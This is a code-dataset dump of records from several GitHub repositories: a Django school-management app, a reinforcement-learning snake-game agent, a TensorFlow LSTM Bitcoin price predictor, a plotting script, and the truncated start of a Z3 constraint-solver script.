30.5, "blob_id": "f0c0b85f0feb6bd11dd63ca5a1519c0489b5b8c0", "content_id": "14173678ed4790428d2fce0796dad92151f59f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 69, "num_lines": 4, "path": "/README.md", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "# unsupervised_mt\n\nA code base for experiments in the footsteps of the following article\nhttps://arxiv.org/pdf/1711.00043.pdf\n" } ]
5
Wukwim/RLChina2021-course4
https://github.com/Wukwim/RLChina2021-course4
8eb925fcf7466436ba3cc5cb2162ece52780fc39
574a1a807028732ff5d70126bdfcdec8e236fe8c
552f0e23c62d63a5dec6463d4aa75a65656baf54
refs/heads/main
2023-07-13T13:37:18.922804
2021-08-26T08:56:51
2021-08-26T08:56:51
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5963250398635864, "alphanum_fraction": 0.6150786280632019, "avg_line_length": 28.824859619140625, "blob_id": "496d4d71a096a10a3e09cd06927ae4570330a8cc", "content_id": "38ce1058596c64971e61bab07a305111c75e7a1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5443, "license_type": "no_license", "max_line_length": 92, "num_lines": 177, "path": "/examples/algo/homework/submission.py", "repo_name": "Wukwim/RLChina2021-course4", "src_encoding": "UTF-8", "text": "# # This is homework.\n# # Load your model and submit this to Jidi\n\nimport torch\nimport os\n\n# load critic\nfrom pathlib import Path\nimport sys\n\nbase_dir = Path(__file__).resolve().parent\nsys.path.append(str(base_dir))\nfrom critic import Critic\nimport numpy as np\n\n''' Block1: IQL Build'''\n\n\nclass MultiRLAgents:\n def __init__(self):\n self.agents = list()\n self.n_player = 2\n\n for i in range(self.n_player):\n agent = IQL() # TODO:\n self.agents.append(agent) # 用不同网络怎么办 -- 还是要拆一下\n\n def choose_action_to_env(self, observation, id):\n obs_copy = observation.copy()\n action_from_algo = self.agents[id].choose_action(obs_copy)\n action_to_env = self.action_from_algo_to_env(action_from_algo)\n\n return action_to_env\n\n def action_from_algo_to_env(self, joint_action):\n joint_action_ = []\n for a in range(1):\n action_a = joint_action\n each = [0] * 4\n each[action_a] = 1\n joint_action_.append(each)\n\n return joint_action_\n\n def load(self, file_list):\n for index, agent in enumerate(self.agents):\n agent.load(file_list[index])\n\n\n# TODO\nclass IQL:\n def __init__(self):\n # pass\n self.state_dim = 18\n self.action_dim = 4\n self.hidden_size = 64\n # self.given_net_flag = given_net_flag\n # self.given_net = Critic(self.state_dim, self.action_dim, self.hidden_size)\n\n self.critic_eval = Critic(self.state_dim, self.action_dim, self.hidden_size)\n\n def choose_action(self, observation):\n observation = torch.tensor(observation, dtype=torch.float).view(1, -1)\n action = torch.argmax(self.critic_eval(observation)).item()\n\n return action\n\n def load(self, file):\n # pass\n self.critic_eval.load_state_dict(torch.load(file))\n\n\n# TODO\n\n\n''' Block2: State to Observations '''\n\n\ndef get_surrounding(state, width, height, x, y):\n surrounding = [state[(y - 1) % height][x], # up\n state[(y + 1) % height][x], # down\n state[y][(x - 1) % width], # left\n state[y][(x + 1) % width]] # right\n\n return surrounding\n\n\ndef make_grid_map(board_width, board_height, beans_positions: list, snakes_positions: dict):\n snakes_map = [[[0] for _ in range(board_width)] for _ in range(board_height)]\n for index, pos in snakes_positions.items():\n for p in pos:\n snakes_map[p[0]][p[1]][0] = index\n\n for bean in beans_positions:\n snakes_map[bean[0]][bean[1]][0] = 1\n\n return snakes_map\n\n\ndef get_observations(state, id, obs_dim):\n state_copy = state.copy()\n board_width = state_copy['board_width']\n board_height = state_copy['board_height']\n beans_positions = state_copy[1]\n snakes_positions = {key: state_copy[key] for key in state_copy.keys() & {2, 3, 4, 5, 6}}\n snakes_positions_list = []\n for key, value in snakes_positions.items():\n snakes_positions_list.append(value)\n snake_map = make_grid_map(board_width, board_height, beans_positions, snakes_positions)\n state = np.array(snake_map)\n state = np.squeeze(snake_map, axis=2)\n\n observations = np.zeros((1, obs_dim)) # todo\n snakes_position = np.array(snakes_positions_list, dtype=object)\n beans_position = np.array(beans_positions, dtype=object).flatten()\n agents_index = [id]\n for i, element in enumerate(agents_index):\n # # self head position\n observations[i][:2] = snakes_positions_list[element][0][:]\n\n # head surroundings\n head_x = snakes_positions_list[element][0][1]\n head_y = snakes_positions_list[element][0][0]\n\n head_surrounding = get_surrounding(state, board_width, board_height, head_x, head_y)\n observations[i][2:6] = head_surrounding[:]\n\n # beans positions\n observations[i][6:16] = beans_position[:]\n\n # other snake positions # todo: to check\n snake_heads = np.array([snake[0] for snake in snakes_position])\n snake_heads = np.delete(snake_heads, element, 0)\n observations[i][16:] = snake_heads.flatten()[:]\n\n return observations.squeeze().tolist()\n\n\n# todo\n''' Block3: Load your model '''\n# Once start to train, u can get saved model. Here we just say it is critic.pth.\ncritic_net_0 = os.path.dirname(os.path.abspath(__file__)) + '/critic_0_30000.pth'\ncritic_net_1 = os.path.dirname(os.path.abspath(__file__)) + '/critic_1_30000.pth'\n# 不共享网络就加载两套不一样的 共享就加载两套一样的\n\ncritic_list = [critic_net_0, critic_net_1]\n\nagent = MultiRLAgents()\nagent.load(critic_list)\n\nn_player = 2\n# todo\n''' observation 是一个agent的state 状态信息 包含以下内容 -- \nobservation = \n{1: [[2, 1], [5, 6], [2, 6], [1, 7], [5, 0]], \n 2: [[0, 5], [0, 6], [0, 7]], \n 3: [[3, 0], [3, 7], [3, 6]], \n 'board_width': 8, \n 'board_height': 6, \n 'last_direction': None, \n 'controlled_snake_index': 2\n}\n'''\n\n\n# 对一条蛇的观测 输出这条蛇的动作\ndef my_controller(observation, action_space, is_act_continuous=False):\n # obs = observation['obs']\n obs = observation\n o_index = obs['controlled_snake_index']\n o_index -= 2 # 看看observation里面的'controlled_snake_index'和我们蛇的索引正好差2\n\n obs = get_observations(observation, o_index, 18)\n\n action_ = agent.choose_action_to_env(obs, o_index)\n\n return action_\n" }, { "alpha_fraction": 0.5183927416801453, "alphanum_fraction": 0.5625353455543518, "avg_line_length": 23.60869598388672, "blob_id": "150070d0e256fd7c56abc950e4d838cb80f838e5", "content_id": "db1ed70bd82d0948ce931ea4e6d060d409058981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1827, "license_type": "no_license", "max_line_length": 74, "num_lines": 69, "path": "/examples/plot.py", "repo_name": "Wukwim/RLChina2021-course4", "src_encoding": "UTF-8", "text": "import os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pyplot import MultipleLocator\r\n\r\nplot_freq = 500\r\nx_min = 0\r\nx_max = 35000\r\ny_min = 60\r\ny_max = 300\r\n\r\n# 解决中文显示问题\r\nfont1 = {'family': 'SimHei',\r\n 'weight': 'normal',\r\n 'size': 14}\r\nfont = {'family': 'Times New Roman',\r\n 'weight': 'normal',\r\n 'size': 16}\r\nlabelsize = 13\r\n\r\nif os.path.exists('Gt.txt'):\r\n f1 = open('Gt.txt', \"r\")\r\n lines1 = f1.readlines()\r\n a1 = []\r\n for line in lines1:\r\n a1.append(float(line))\r\n # 重组数组\r\n a10 = np.array(a1)\r\n print('Episode:', len(a1))\r\n\r\n # 数组舍弃余数重组\r\n rest1 = len(a10) % plot_freq\r\n for i in range(rest1):\r\n a10 = np.delete(a10, len(a10) - rest1)\r\n len(a1) * plot_freq + rest1,\r\n a10 = a10.reshape(-1, plot_freq)\r\n a1 = a10.mean(axis=1)\r\n\r\n plt.figure(1)\r\n num1 = list(range(len(a1)))\r\n reward_list = []\r\n for num in num1:\r\n num *= plot_freq\r\n reward_list.append(num)\r\n plt.axis([0, x_max, y_min, y_max])\r\n # plt.grid(linestyle='-.')\r\n # plt.xlabel('episodes', font)\r\n # plt.ylabel('Average reward', font)\r\n plt.xlabel('训练回合数', font1)\r\n plt.ylabel('平均奖励值', font1)\r\n a1 = np.array(a1)\r\n a10 = np.mean(a1)\r\n plt.title('mean is %.4f' % a10, font)\r\n print('Gt is %.6f' % a10)\r\n\r\n plt.plot(reward_list, a1, c='blue', ls='-', marker='', label=\"MADDPG\")\r\n plt.grid()\r\n plt.tick_params(labelsize=labelsize)\r\n # plt.legend(loc='lower right', prop=font)\r\n\r\n x_major_locator = MultipleLocator(5000)\r\n y_major_locator = MultipleLocator(20)\r\n ax = plt.gca()\r\n ax.xaxis.set_major_locator(x_major_locator)\r\n ax.yaxis.set_major_locator(y_major_locator)\r\n\r\n\r\n plt.savefig('Gt.png')\r\n plt.show()\r\n" } ]
2
rubenvereecken/show-attend-and-tell
https://github.com/rubenvereecken/show-attend-and-tell
2077371d3d96cc1e7aef34f6608845e068a26c57
79a635583fa8d63eaefe2a6a74922b66b7cf9186
0f5799dea54d2ad5545a95607323c48c46ee2026
refs/heads/master
2020-03-29T02:16:41.247224
2017-06-22T08:50:08
2017-06-22T09:49:30
94,643,651
0
0
null
2017-06-17T19:05:33
2017-06-15T14:11:14
2017-05-23T03:55:10
null
[ { "alpha_fraction": 0.5705483555793762, "alphanum_fraction": 0.5921133756637573, "avg_line_length": 45.371429443359375, "blob_id": "405d64f0b090094b03bd34b4a441e1a97aaff6b3", "content_id": "838fed3e9fbb8496b8746d3add6805e8adb0f503", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1623, "license_type": "permissive", "max_line_length": 114, "num_lines": 35, "path": "/train.py", "repo_name": "rubenvereecken/show-attend-and-tell", "src_encoding": "UTF-8", "text": "from core.solver import CaptioningSolver\nfrom core.model import CaptionGenerator\nfrom core.utils import load_coco_data\n\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data-path', dest='data_path', default='./data')\n parser.add_argument('--image-path', dest='image_path', default='./image')\n parser.add_argument('--model-path', dest='model_path', default='model/lstm')\n parser.add_argument('--test-model', dest='test_model', default='model/lstm/model-10')\n\n args = parser.parse_args()\n\n # load train dataset\n data = load_coco_data(data_path=args.data_path, split='train')\n word_to_idx = data['word_to_idx']\n # load val dataset to print out bleu scores every epoch\n val_data = load_coco_data(data_path=args.data_path, split='val')\n\n model = CaptionGenerator(word_to_idx, dim_feature=[196, 512], dim_embed=512,\n dim_hidden=1024, n_time_step=16, prev2out=True,\n ctx2out=True, alpha_c=1.0, selector=True, dropout=True)\n\n solver = CaptioningSolver(model, data, val_data, n_epochs=20, batch_size=128, update_rule='adam',\n learning_rate=0.001, print_every=1000, save_every=1,\n image_path=args.image_path + '/', # Why the trailing slash?\n pretrained_model=None, model_path=args.model_path, test_model=args.test_model,\n print_bleu=True, log_path='log/')\n\n solver.train()\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
zwlanpishu/Bitcoin-Prediction
https://github.com/zwlanpishu/Bitcoin-Prediction
18eafbaed00ac85a92b87e574ca3068e18cfafb2
117e3d9ae0c35d26d864127f97ff9f1ec65c6c26
a39b9573281e1416234cd66f912fb71a74c826ad
refs/heads/master
2020-04-11T18:42:20.344599
2018-12-20T02:42:17
2018-12-20T02:42:17
162,008,587
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.5752788186073303, "alphanum_fraction": 0.5911625623703003, "avg_line_length": 34.416168212890625, "blob_id": "e367a66ea0931f070a802f0c9c390f5ab529bbfa", "content_id": "42f55b63ccc6de480591fa2680dac8d1dda6fcb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11836, "license_type": "no_license", "max_line_length": 112, "num_lines": 334, "path": "/BitcoinPredict.py", "repo_name": "zwlanpishu/Bitcoin-Prediction", "src_encoding": "UTF-8", "text": "import tensorflow as tf \nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport math\nfrom sklearn.preprocessing import StandardScaler\nimport io\n\n\ndef data_preprocess() : \n \"\"\"\n implement the Bitcoin data preprocess\n return: scaled data of the select target with shape (1273, 1)\n \"\"\"\n\n # load the Bitcoin data needed\n btc = pd.read_csv(\"btc.csv\")\n\n # select the target data to be predicted, the data got is one dimension ndarray\n data_to_use = btc[\"Close\"].values\n print(data_to_use.shape)\n assert(data_to_use.shape == (1273,))\n\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data_to_use.reshape(-1, 1))\n assert(scaled_data.shape == (1273, 1))\n\n # plot the data to have an intuition\n plt.figure(figsize = (8, 6), frameon = False, facecolor = \"brown\", edgecolor = \"blue\")\n plt.title(\"Bitcoin Prices from December 2014 to May 2018\")\n plt.xlabel(\"Days\")\n plt.ylabel(\"Scaled Price of Bitcoin\")\n plt.plot(scaled_data, label = \"Price\")\n plt.show()\n\n\n return scaled_data\n\n\ndef data_windowing(data, window_size = 7) :\n \"\"\"\n windowing the data for the later RNN\n return: X -- the window data list, 1266 elements, each element is a (1, 1, 7) ndarray\n Y -- the window data list, 1266 elements, each element is a (1, 1, 1) ndarray\n \"\"\"\n\n X = []\n Y = []\n index = 0\n while ((index + window_size) <= len(data) - 1) : \n window_X = data[index : index + window_size, :].reshape(1, 1, window_size)\n window_Y = data[index + window_size, :].reshape(1, 1, 1)\n X.append(window_X)\n Y.append(window_Y)\n index += 1\n \n assert(len(X) == len(Y))\n print(\"the len of X is: \" + str(len(X)))\n print(\"the len of Y is: \" + str(len(Y)))\n return X, Y\n\n\ndef build_dataset(X, y) : \n \"\"\"\n build the train dataset and test dataset\n return: X_train -- ndarray of shape (1018, 1, 1, 7)\n y_train -- ndarray of shape (1018, 1, 1, 1)\n X_test -- ndarray of shape (248, 1, 1, 7)\n y_test -- ndarray of shape (248, 1, 1, 1)\n \"\"\"\n\n # build the training dataset\n X_train = np.array(X[ : 1018])\n y_train = np.array(y[ : 1018])\n\n # build the testing dataset\n X_test = np.array(X[1018 : ])\n y_test = np.array(y[1018 : ])\n\n # take care of the dimensions of dataset\n print(\"X_train size is \" + str(X_train.shape))\n print(\"y_train size is \" + str(y_train.shape))\n\n print(\"X_test size is \" + str(X_test.shape))\n print(\"y_test size is \" + str(y_test.shape))\n\n return X_train, y_train, X_test, y_test\n\n\ndef build_mini_batches(X_train, y_train, mini_batch_size = 1) : \n \"\"\"\n build the mini batches of training dataset\n return: mini_batches -- the list of turple, contains (mini_batch_X, mini_batch_Y)\n where mini_batch_X's shape is (mini_batch_size, 1, 1, 7)\n where mini_batch_Y's shape is (mini_batch_size, 1, 1, 1)\n \"\"\"\n\n num = X_train.shape[0]\n mini_batches = []\n \n num_complete_minibatches = math.floor(num / mini_batch_size)\n\n for i in range(0, num_complete_minibatches * mini_batch_size, mini_batch_size) : \n mini_batch_X = X_train[i : i + mini_batch_size]\n mini_batch_Y = y_train[i : i + mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n if (num % mini_batch_size != 0) : \n mini_batch_X = X_train[num_complete_minibatches * mini_batch_size : ]\n mini_batch_Y = y_train[num_complete_minibatches * mini_batch_size : ]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n \n return mini_batches\n\n\ndef create_XY(window_size, dim_x, dim_y) : \n \"\"\"\n create the place_holders of X and Y\n return: X -- is a mini_batch place_holder of training data\n Y -- is a mini_batch place_holder of training data\n \"\"\"\n X = tf.placeholder(tf.float32, (1, dim_x, 1, window_size))\n Y = tf.placeholder(tf.float32, (1, dim_y, 1, 1))\n return X, Y\n\n\ndef initialize_para(dim_x, dim_y, dim_a) : \n\n # weights for the update gate\n weights_update_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_update_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_update = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the forget gate\n weights_forget_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_forget_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_forget = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the output gate\n weights_output_gate = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_output_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_output = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the memory cell\n weights_memory = tf.Variable(tf.truncated_normal((dim_a, dim_x), stddev = 0.05))\n weights_memory_activ = tf.Variable(tf.truncated_normal((dim_a, dim_a), stddev = 0.05))\n bias_memory = tf.Variable(tf.zeros((dim_a, 1)))\n\n # weights for the predict layer\n weights_predict = tf.Variable(tf.truncated_normal((dim_y, dim_a), stddev = 0.05))\n bias_predict = tf.Variable(tf.zeros((dim_y, 1)))\n\n parameters = {\"weights_update_gate\" : weights_update_gate,\n \"weights_update_activ\" : weights_update_activ,\n \"bias_update\" : bias_update, \n \"weights_forget_gate\" : weights_forget_gate, \n \"weights_forget_activ\" : weights_forget_activ, \n \"bias_forget\" : bias_forget, \n \"weights_output_gate\" : weights_output_gate, \n \"weights_output_activ\" : weights_output_activ, \n \"bias_output\" : bias_output, \n \"weights_memory\" : weights_memory,\n \"weights_memory_activ\" : weights_memory_activ, \n \"bias_memory\" : bias_memory,\n \"weights_predict\" : weights_predict,\n \"bias_predict\" : bias_predict}\n\n return parameters\n\n\ndef LSTM_unit(x_t, c_prev, a_prev, parameters) : \n \"\"\"\n implement the LSTM unit for RNN\n argument: x_t -- x at time t\n c_prev -- c at time t - 1\n a_prev -- a at time t - 1\n parameters -- weights and bias for LSTM unit\n \n return: c_next -- c at time t\n a_next -- a at time t\n \"\"\"\n\n update_gate = tf.sigmoid(tf.matmul(parameters[\"weights_update_gate\"], x_t) + \n tf.matmul(parameters[\"weights_update_activ\"], a_prev) + \n parameters[\"bias_update\"])\n\n forget_gate = tf.sigmoid(tf.matmul(parameters[\"weights_forget_gate\"], x_t) + \n tf.matmul(parameters[\"weights_forget_activ\"], a_prev) + \n parameters[\"bias_forget\"])\n\n output_gate = tf.sigmoid(tf.matmul(parameters[\"weights_output_gate\"], x_t) + \n tf.matmul(parameters[\"weights_output_activ\"], a_prev) + \n parameters[\"bias_output\"]) \n\n c_tilde = tf.tanh(tf.matmul(parameters[\"weights_memory\"], x_t) + \n tf.matmul(parameters[\"weights_memory_activ\"], a_prev) + \n parameters[\"bias_memory\"])\n \n c_next = update_gate * c_tilde + forget_gate * c_prev\n a_next = output_gate * tf.tanh(c_next)\n\n return c_next, a_next\n\n\ndef forward_propagation(x, parameters, dim_x, dim_y, dim_a) :\n \"\"\"\n implement the forward propagation\n \"\"\"\n\n window_size = x.shape[-1]\n c_0 = np.zeros((dim_a, 1), dtype = np.float32)\n a_0 = np.zeros((dim_a, 1), dtype = np.float32)\n c_next = c_0\n a_next = a_0\n \n for t in range(window_size) : \n c_next, a_next = LSTM_unit(x[0, :, :, t], c_next, a_next, parameters)\n predict = tf.matmul(parameters[\"weights_predict\"], a_next) + parameters[\"bias_predict\"]\n\n return predict\n \n \ndef compute_cost(predict, Y) : \n \"\"\"\n compute the cost of one mini_batch\n \"\"\"\n\n print(\"the shape of predict is \" + str(predict.shape))\n print(\"the shape of Y is \" + str(Y.shape))\n print(\"the shape of Y[0, :, :, 0] is \" + str(Y[0, :, :, 0].shape))\n \n cost = tf.reduce_mean(tf.losses.mean_squared_error(Y[0, :, :, 0], predict))\n print(\"the cost is \" + str(cost))\n return cost\n\n\ndef predict_model(X_train, X_test, Y_train, Y_test, learning_rate = 0.001,\n num_epoches = 200, mini_batch_size = 1, \n dim_a = 256, print_cost = True) : \n \"\"\"\n implement the Bitcoin predict model\n \"\"\"\n\n # reset computation graph \n tf.reset_default_graph()\n\n # get dimensions\n assert(X_train.shape[0] == Y_train.shape[0])\n (num, dim_x, _, window_size) = X_train.shape\n (num, dim_y, _, _) = Y_train.shape\n\n num_mini_batches = num / mini_batch_size\n costs = []\n\n # build the computation graph\n X, Y = create_XY(window_size, dim_x, dim_y)\n parameters = initialize_para(dim_x, dim_y, dim_a)\n predict = forward_propagation(X, parameters, dim_x, dim_y, dim_a)\n cost = compute_cost(predict, Y)\n\n # define optimizer with gradient clipping\n gradients = tf.gradients(cost, tf.trainable_variables())\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, 4)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n trained_optimizer = optimizer.apply_gradients(zip(clipped_gradients, tf.trainable_variables()))\n\n init = tf.global_variables_initializer()\n\n # run the session to optimize the cost\n sess = tf.Session()\n sess.run(init)\n\n for i in range(num_epoches) : \n mini_batch_cost = 0\n mini_batches = build_mini_batches(X_train, Y_train, mini_batch_size)\n\n for mini_batch in mini_batches : \n (mini_batch_X, mini_batch_Y) = mini_batch\n temp_cost, _ = sess.run([cost, trained_optimizer], feed_dict = {X : mini_batch_X, Y : mini_batch_Y})\n mini_batch_cost += (temp_cost / num_mini_batches)\n \n if (print_cost == True) and (i % 5 == 0) : \n print(\"After epoch %d %f\" %(i, mini_batch_cost))\n if (print_cost == True) and (i % 1 == 0) : \n costs.append(mini_batch_cost)\n \n plt.figure()\n plt.plot(costs)\n plt.ylabel(\"cost\")\n plt.xlabel(\"epoches\")\n plt.title(\"learning rate = \" + str(learning_rate))\n plt.show()\n \n\n # predict on the test set\n predicts_test = []\n error = 0\n mini_batches_test = build_mini_batches(X_test, Y_test, mini_batch_size)\n for mini_batch_test in mini_batches_test : \n (mini_test_X, mini_test_Y) = mini_batch_test\n predict_test = sess.run(predict, feed_dict = {X : mini_test_X})\n assert(predict_test.shape == mini_test_Y[0, :, :, 0].shape)\n\n error += np.mean(np.square(predict_test - mini_test_Y[0, :, :, 0]))\n predicts_test.append(predict_test.reshape(()))\n \n \n error = error / len(mini_batches_test)\n return predicts_test, error\n\n\n\n\"\"\"\nthe main func process\n\"\"\"\n# get the training set data and the testing set data\nscaled_data = data_preprocess()\nX, Y = data_windowing(scaled_data)\nX_train, Y_train, X_test, Y_test = build_dataset(X, Y)\n\n# run the model to get the predicts\npredicts_test, error = predict_model(X_train, X_test, Y_train, Y_test)\n\n# \nplt.figure(figsize = (8, 6), frameon = False, facecolor = \"brown\", edgecolor = \"blue\")\nplt.title(\"Bitcoin Prices Predicted\")\nplt.xlabel(\"Days\")\nplt.ylabel(\"Scaled Price of Bitcoin\")\nplt.plot(np.squeeze(Y_test), label = \"Real Price\")\nplt.plot(np.array(predicts_test), label = \"Prediction Price\")\nplt.legend()\nplt.show()\n\n\n\n\n\n\n\n" } ]
1
jonlatorre/gestioneide
https://github.com/jonlatorre/gestioneide
d7d133f4708ad676e525f622264e7bc641e77e7a
fc470a55b0a15171452f1c89e75aa65059f5c56d
d012e6fa57f6dc92a82488073bbedad16ddd1012
refs/heads/master
2016-09-07T03:51:03.669336
2015-07-01T18:22:27
2015-07-01T18:22:27
10,667,395
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6873786449432373, "alphanum_fraction": 0.6873786449432373, "avg_line_length": 38.61538314819336, "blob_id": "c404abd8b0544fec4407a363666fb198ea61ca9d", "content_id": "fe1494cd699155fbda09753284b1687629cfcb55", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "permissive", "max_line_length": 84, "num_lines": 13, "path": "/profesores/urls.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib import admin\nadmin.autodiscover()\nfrom views import *\n\n\nurlpatterns = patterns(\"\",\n url(r\"^$\", ListaProfesores.as_view(), name=\"profesores_lista\"),\n url(r\"^nuevo/$\", NuevoProfesor.as_view(), name=\"profesor_nuevo\"),\n url(r\"^editar/(?P<pk>\\d+)/$\", EditarProfesor.as_view(), name=\"profesor_editar\"),\n url(r\"^borrar/(?P<pk>\\d+)/$\", BorrarProfesor.as_view(), name=\"profesor_borrar\"),\n )\n" }, { "alpha_fraction": 0.698113203048706, "alphanum_fraction": 0.698113203048706, "avg_line_length": 33.45000076293945, "blob_id": "5435db66cad00de6cf3ad4d38841346955aa29cf", "content_id": "aeb0a3032e8edc57c2572b4cdfc404621e7a7b7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 81, "num_lines": 20, "path": "/gestioneide/urls.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.contrib import admin\n\n\nurlpatterns = patterns(\n \"\",\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^admin/\", include(admin.site.urls)),\n url(r\"^account/\", include(\"account.urls\")),\n url(r\"^aulas/\", include(\"aulas.urls\")),\n url(r\"^profesores/\", include(\"profesores.urls\")),\n url(r\"^grupos/\", include(\"grupos.urls\")),\n url(r\"^clases/\", include(\"clases.urls\")),\n)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n" }, { "alpha_fraction": 0.7986577153205872, "alphanum_fraction": 0.7986577153205872, "avg_line_length": 20.285715103149414, "blob_id": "a5d76bbdcfaeac2462daa9ef4e1b6b56f0875f16", "content_id": "302ab44e255ba3802b9277b8e504a11792ac35b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "permissive", "max_line_length": 44, "num_lines": 7, "path": "/profesores/admin.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom models import *\n\nclass ProfesorAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Profesor, ProfesorAdmin)\n" }, { "alpha_fraction": 0.6468842625617981, "alphanum_fraction": 0.6646884083747864, "avg_line_length": 36.44444274902344, "blob_id": "fe66aa1b6746d46bd9b8e79f65fa78fa9ebdaf1f", "content_id": "59901a15850b4012682fab6f43e0a9b0c3865ce1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 337, "license_type": "permissive", "max_line_length": 59, "num_lines": 9, "path": "/profesores/models.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass Profesor(models.Model):\n nombre = models.CharField('Nombre',max_length=255,)\n apellido = models.CharField('Apellido',max_length=255,)\n def __unicode__(self):\n return \"%s %s\"%(self.nombre,self.apellido)\n def get_absolute_url(self):\n return \"/profesores/editar/%i/\" % self.id\n" }, { "alpha_fraction": 0.7613168954849243, "alphanum_fraction": 0.7613168954849243, "avg_line_length": 29.375, "blob_id": "383b9c44cffb975d78ca05150f3a7e60f5be6c2e", "content_id": "049ec00a50d31cf07af89bf4ad8f25dae8dd3a61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "permissive", "max_line_length": 72, "num_lines": 24, "path": "/profesores/views.py", "repo_name": "jonlatorre/gestioneide", "src_encoding": "UTF-8", "text": "from django.views.generic import ListView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom models import *\n#from forms import *\n\nclass ListaProfesores(ListView):\n model = Profesor\n template_name=\"profesores.html\"\n context_object_name = \"profesores_list\"\n \nclass NuevoProfesor(CreateView):\n\tmodel = Profesor\n\ttemplate_name=\"profesor_nuevo.html\"\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n\t\nclass EditarProfesor(UpdateView):\n\tmodel = Profesor\n\ttemplate_name=\"profesor_editar.html\"\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n\nclass BorrarProfesor(DeleteView):\n\tmodel = Profesor\n\t\n\tsuccess_url = '/profesores' ## FIXME esto deberia ser un reverse\n" } ]
5
testrepo007/Constraint-solver
https://github.com/testrepo007/Constraint-solver
33a686d5ad4dc455265c6a486f8bffd1a1959367
9e0a52d16f14802b33e3317bdd26829e4f081b13
04cc66211ab246e9e48dea7d65823bf309f3d575
refs/heads/master
2020-04-24T07:10:40.562327
2019-02-21T03:01:08
2019-02-21T03:01:08
171,789,834
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.835616409778595, "alphanum_fraction": 0.835616409778595, "avg_line_length": 35.5, "blob_id": "7e9e020f3c99cb8cca1a8abf3eb31fcc4455a593", "content_id": "86b8ea6643964a38b1a23be57392bf4bf70f7d90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 73, "license_type": "no_license", "max_line_length": 52, "num_lines": 2, "path": "/README.md", "repo_name": "testrepo007/Constraint-solver", "src_encoding": "UTF-8", "text": "# Constraint-solver\nConstraint solver used in generating trace for Light\n" }, { "alpha_fraction": 0.7235475778579712, "alphanum_fraction": 0.7415099740028381, "avg_line_length": 34.63999938964844, "blob_id": "b65b5d9d6aab186d1617821962c70d623fd6245f", "content_id": "3a62aa8a87ea91b91d94eb4bacedbbab152c9b2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3563, "license_type": "no_license", "max_line_length": 140, "num_lines": 100, "path": "/cs.py", "repo_name": "testrepo007/Constraint-solver", "src_encoding": "UTF-8", "text": "from z3 import *\nf = open(\"dependencySet.out\",\"r\")\n#OutputListFormat following will have a List of Lists eg [[12 23 53],[23,64,35],[345,554,545,84]]\nOutputListFormat = list()\n\n#prepopulate outputlistFormat with empty lists\nfor i in range(10):\n\tOutputListFormat.insert(i,list())\n\ninputDependencySet = []\n# declare two lists for inter-thread dependencies\nhbFrom = list()\nhbTo = list()\n\nif f.mode == \"r\":\n\tinputDependencySet = f.readlines() # read in all the dependency pairs\n\tfor inputLine in inputDependencySet:\n\t\tdependencyArray = 